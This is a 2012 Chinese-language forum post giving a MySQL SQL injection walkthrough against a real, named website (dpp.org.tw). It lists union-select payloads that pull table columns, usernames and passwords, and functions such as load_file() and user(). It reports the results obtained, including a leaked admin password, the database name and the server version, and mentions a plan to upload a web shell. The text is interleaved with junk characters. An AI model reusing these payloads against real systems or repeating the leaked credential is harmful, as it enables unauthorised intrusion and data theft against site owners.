标题: 我的mysql注入代码 [打印本页] 作者: admin 时间: 2012-9-13 16:41 标题: 我的mysql注入代码 MYSQL常用注入代码6 h0 P2 o* A m. S' v% H1 e0 W
" X' P9 _" U; J, C
and (select count(*) from mysql.user)>0/* 判断读取权限 . w; N( k7 F- \( O: b. t
& u- F- b7 B+ A1 |. F! D7 A' qunion select 1,concat_ws(0x3a,username,password),3,4 猜解用户名和密码 8 ?# |" K+ e+ S" O! G0 f* D# Q; n" o1 T" U! J
- Y% t3 L2 {! E. L' \, P7 A
# }/ y" ^+ O& F+ ? % B$ Y# ^" `' ~: q3 w* z知道了字段长度后我们用union select联合查询来列出所有字段2 `- Z* X; `3 J; Q B' V' v
+ T" P7 {5 W# _ http://www.dpp.org.tw/news_conte ... menu=44&sn=3575 union select 1,2,3,4,5,6,7,8,9,10,11/** //这里我们列出了11个字段,并且以/*结束符告诉MYSQL,命执行完毕。9 K8 ?# i/ c& L( ?
/ v# h0 [" g7 f B. p8 O5 u
这里返回 3/11 4 这几个字段) H# n' m/ Q: z6 n1 K+ Y% S- {
) s9 C. f: u% {4 `( Y列出字段后就可以在回显的相应的字段上,替换你要查询的字段名,再from表名.就可以暴出相应的字段内容,这里我们用passwd替换 4 这个字段 7 o, ]* u. Y) q: m0 a5 e2 y; U) I6 w! C
如:( O a* s- U* T8 y. m
$ e1 V C9 r; \" Ehttp://www.dpp.org.tw/news_conte ... menu=44&sn=3575 and 1=2 union select 1,2,3,passw,5,6,7,8,9,10,11 from admin/* ; o) T1 x; J* u1 O+ c
" _1 F3 b" C1 z/ L
这里返回密码641223,因为小波入侵过,所以事先知道了用户名,到这里就成功得到后台的管理密码。但是上次被黑之后管理员把后台改掉了,无法通过GOOGLE搜索到,我也没猜出来,所以后台登陆上传拿SHELL的方法就断了。 6 L1 o7 c3 b9 }, D0 c下面简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。 / \, s! f7 A' [ {9 ` }' t, p & p Y' d& E" N5 p" K1:system_user() 系统用户名 1 u0 A3 v" m( L5 a2:user() 用户名# G2 \( V% U, R' L( q f( S
3:current_user 当前用户名 8 ^+ w, K8 C' ?& v" Z4:session_user()连接数据库的用户名 3 `3 W' x) R8 {- N1 v& K- f; n/ ~5:database() 数据库名 c# r) p, J y8 X0 t% h
6:version() MYSQL数据库版本; u$ \$ r+ ~$ |3 G# `, L
7:load_file() MYSQL读取本地文件的函数; n, y+ N: f/ U( r
8@datadir 读取数据库路径 : n" }! I* k! Z2 d; \& m9@basedir MYSQL 安装路径; i% h, P1 @0 Z. A L
10@version_compile_os 操作系统 ) o: a D' C+ {$ h, Q. S- T8 r/ ]: H( k
利用的方法如下: ; d: g5 R G- y9 D) _- ~% q) b a6 h0 Y# f6 w
在刚才返回的字段3上替换上database()函数,4上替换上system_user()函数,11上替换session_user()函数。 @! _2 }" S! |- B( W5 Z+ E) g" l - g0 x0 w6 I7 Xhttp://www.dpp.org.tw/news_conte ... menu=44&sn=3575 union select 1,2,database(),system_user(),5,6,7,8,9,10,session_user()/** 4 H# l5 v" k: X, z5 r) d. N2 b9 [! k' \0 P. P
执行后字段 3,4,11 分别返回 数据库名:dpp 系统用户名:dpp@localhost 连接数据库用户名:dpp@localhost5 H; V3 H5 t8 k4 |, {
1 ~% b- k D* y; O: \# T( q- t0 o; M7 rhttp://www.dpp.org.tw/news_conte ... menu=44&sn=3575 union select 1,2,3,version(),5,6,7,8,9,10,7/*, o1 a y! J' P& _8 `7 a
7 U, N& @. V* D8 c( }( Z
返回当前MYSQL数据库版本 5.0.51a ,(5.0以上都支持UNION联合查询)5 D5 ^! n, a: C